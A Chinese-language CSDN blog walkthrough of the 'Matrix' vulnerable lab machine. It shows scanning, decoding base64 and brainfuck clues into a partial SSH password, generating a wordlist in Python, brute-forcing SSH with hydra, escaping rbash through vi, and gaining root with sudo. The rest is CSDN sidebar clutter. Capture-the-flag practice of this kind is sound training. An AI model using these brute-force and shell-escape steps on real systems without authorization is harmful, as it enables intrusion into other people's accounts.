Machine_Matrix 靶机

最新推荐文章于 2024-11-11 19:50:19 发布
最新推荐文章于 2024-11-11 19:50:19 发布
阅读量110 收藏
点赞数
分类专栏: 渗透测试 文章标签: 网络安全 安全威胁分析 服务器 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134160186
版权

Machine_Matrix

信息搜集

存活检测

image-20231101124718365

详细扫描

image-20231101124736978

后台网页扫描

image-20231101124729186

网页信息搜集

80 端口未发现有用信息

image-20231101124921443

访问 nmap 扫描出的 http 31337 端口

image-20231101125354709

在源码中发现了一串密文

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

image-20231101125425331

base64 解密

image-20231101125523778

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

像是输出了一句话到 Cypher.matrix 文件中

禅师访问 Cypher.matrix 文件

image-20231101125711661

brainfuck 解密

image-20231101125856267

You can enter into matrix as guest, with password k1ll0rXX

Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

说可以用 guest 用户登录,密码是 k1ll0rXX,但是少了最后两位

ssh 登录

编写 python 脚本,生成密码本

import string
all_chars = string.ascii_letters + string.digits
with open("./password.txt","w") as f:
    for i in all_chars:
        for j in all_chars:
            f.writelines("k1ll0r" + i + j+"\n")

image-20231101134511743

hydra 爆破 ssh

hydra -l guest -P password.txt ssh://10.4.7.162 -vV -f  -I -t 64

image-20231101134528843

成功爆破出密码

k1ll0r7n

image-20231101135209683

ssh 登录

ssh guest@10.4.7.162

image-20231101135406385

提权

sudo -l 查看 root 权限,受到 rbash 命令限制

image-20231101135938317

按 Tab 键查看可使用的命令

image-20231101140025983

vi 绕过 rbash 限制

# vim/vi进入之后
:set shell=/bin/sh # 或者用/bin/bash
# 将当前 shell 的默认 shell 设置为 /bin/sh
:shell
# 
 
# 切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

sudo -l 查看 root 权限

image-20231101140605226

该用户拥有全部权限

直接 sudo bash 提权成功

image-20231101140920149

gjl_
关注
专栏目录
t6AdmX_new靶机
08-03
t6AdmX_new靶机
web Machine(n7) 靶场实录
gaopan2667002的博客
09-01 267
反馈了一个flag 靶机的最终目的应该就是找到flag 本以为flag已经找到 到此结束,后来翻看了相关的攻略内容 发现这个flag只是其中的一半。后来查看时间盲注的内容,尝试了一下,send的时候sleep(5)执行了,并且等待了5秒页面才进行刷新。多了一个254的IP,查看了一下本机状态,除了kali以外就只有这个虚拟机是打开的。使用简单的tomcat字典爆破尝试,本机运行内存很小,速度很慢,所以没有选择大的字典。后来查看了虚拟机管理器的IP配置才想起来网段配的是56,并非之前一直使用的233。
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
【标题】"MyOA.rar_easy_myoa_myoa靶机_oa_ssh mysql 框架" 描述了一个基于SSH框架和MySQL数据库的在线办公(OA)系统,名为MyOA,并且它具有一个易于使用的前端界面——Easy UI。这个项目可能用于企业内部的自动化...
新版PHPStudy可用sqli_labs 靶机.zip
03-01
在新版PHPStudy中可以使用的sqli_labs SQL注入靶机。 直接解压压缩包,然后把安装包放在WWW根目录下。 找到\phpstudy_pro\WWW\Sqli_Edited_Version-master\sqlilabs\sql-connections找到这个目录下的db-creds.inc ...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
1-OSCP自学笔记-October靶机练习1
08-04
【OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8539
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
weblogic漏洞——CVE-2020-14882
weixin_57379923的博客
08-13 1377
版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。在 web 服务器中写入 xml 脚本。作 者:PeiyuJue。
Linux - 信号
2302_79539362的博客
11-08 1064
Linux - 信号
linux-vlan
吃不饱、力不足的博客
11-11 428
ns1通过ns1-veth0.100 ping 1.1.1.31时,ns21-veth0和ns23-veth0 vlan id都是100,br0不带vlan id。ns1通过ns1-veth0.200 ping 1.1.1.31时,ns21-veth0和ns23-veth0 vlan id都是200,br0不带vlan id。# 4.veth设备放入命名空间,启动接口。# 5.创建br0,添加接口到br0。# 7.添加子接口到br0。# 3.创建veth设备。# 2.创建命名空间。# 6.创建vlan。
RHCE-第四章:ssh远程连接服务器
obboda的博客
11-11 282
SSH(Secure Shell Protocol,安全的壳程序协议)它可以通过数据包加密技术将等待传输的数据包加密后再传输到网络上。ssh协议本身提供两个服务器功能:一个是类似telnet的远程连接使用shell的服务器;另一个就是类似ftp服务的sftp-server,提供更安全的ftp服务。远程连接服务器的类型(按照登录的连接界面来分类):图形接口:XDMCP、VNC、XRDP等。
linux学习2】linux基本命令行操作总结
CRUSH8496052的博客
11-07 459
Linux命令总结
新的服务器Centos7.6 安卓基础的环境配置(新服务器可直接粘贴使用配置)
weixin_47024018的博客
11-11 662
下面就安装一个docker和nginx及 go 语言的相关配置,命令可以直接粘贴使用!
Intel AMT技术在服务器硬件监控中的应用与解读
MXsoft618的博客
11-06 506
本文将针对监控易软件中Intel AMT技术的监测指标进行解读,并探讨其在服务器硬件监控中的应用。通过监控易软件中的Intel AMT监测指标,运维团队可以实时掌握服务器的各项硬件性能指标,及时发现并解决潜在问题。同时,Intel AMT还支持远程管理和控制功能,运维团队可以通过网络远程访问服务器,进行硬件配置、软件安装等操作,大大提高了运维效率。通过监控易软件中的相关监测指标,运维团队可以更加全面、深入地了解服务器的硬件状态,确保服务器的稳定运行和业务的连续性。
Webserver(5.2)网页服务器框架
学习历程记录和分享
11-08 348
主线程只监听文件描述符上是否有事件发生,有的话就立即将该事件通知工作线程(逻辑单元),将socket可读可写事件放入请求队列,交给工作线程处理。主线程执行数据读写操作,读写完成之后,主线程向工作线程通知这一完成事件。接收、存储,处理来自客户端的HTTP请求,并对其请求做出HTTP响应。需要处理三类事件:IO事件、信号及定时事件。IO处理单元:处理客户连接,读写网络数据。同步IO模型实现reactor模式。网络存储单元:数据库、文件或缓存。请求队列:各单元之间的通信方式。逻辑单元:业务进程或线程。
Webserver(4.4)多进程/多线程实现并发服务器
学习历程记录和分享
11-06 429
子进程:完成通信,接收一个客户端连接,就创建一个子进程用于通信。要实现TCP服务器处理并发的任务,使用多线程或者多进程来解决。同时开启两个客户端,会交叉接收信息。父进程负责等待并接受客户端的连接。这样就支持了并发,多个客户端。一个父进程,多个子进程。
linux startup.sh shutdown.sh (kkFileView)
最新发布
qq 117791303
11-11 184
linux启动脚本和关闭脚本startup.sh shutdown.sh (kkFileView)
如何使用 VNC 服务器连接桌面
猿小白的博客
11-08 209
VNC(Virtual Network Computing,虚拟网络计算)是一种远程桌面共享协议,允许用户通过网络访问和控制远程计算机的桌面界面。VNC 使用的是一种基于图像的方式,将远程计算机的桌面环境发送到客户端的显示设备上,同时接收客户端的鼠标和键盘操作,从而实现远程控制。
戴尔R930服务器增加 Intel X710-DA2双万兆光口含模块
oSuiBian12345678的博客
11-07 1046
服务器升级增加了内存换了固态盘,想着网卡也升级成万兆光卡吧。插上之后发现服务器能识别,但是安装的esxi7.0.3虚拟化系统重不能识别增加的网卡。在dell官网的知识库中找到。
OWASP_BWA靶机的安装及调试
09-24
OWASP BWA(Web Application Security Scanner)是一个免费的开源工具,用于评估Web应用程序的安全漏洞。下面是BWA靶机安装和调试的基本步骤: 1. **下载安装**: - 访问OWASP官网(https://owasp.org/www-project-bwa/) 下载最新版本的BWA安装包,通常是个zip文件。 - 解压到本地目录,比如`/opt/bwa` 或 `c:\bwa`。 - 安装过程中可能会需要Python环境。 2. **配置**: - 创建一个新的配置文件(如`bwascan.json`),提供目标网站的URL、扫描范围等详细信息。 - 可能还需要设置代理服务器,如果需要的话。 3. **运行扫描**: - 使用命令行工具(如`./bwascan`),通过`-i`选项指定配置文件路径,启动扫描过程。 ``` ./bwascan -i /path/to/bwascan.json ``` 4. **调试**: - 如果遇到错误或性能问题,检查日志文件(通常是`log.txt`)。 - BWA有一些命令行选项可以调整扫描行为,例如查看详细的报告 (`--report`),或者限制并发请求数 (`--concurrent-runs`)。 - 调试网络连接和HTTP响应头,确保服务器能够正常响应。 5. **结果分析**: 扫描完成后,会生成一份HTML报告,其中包含发现的问题和建议修复措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值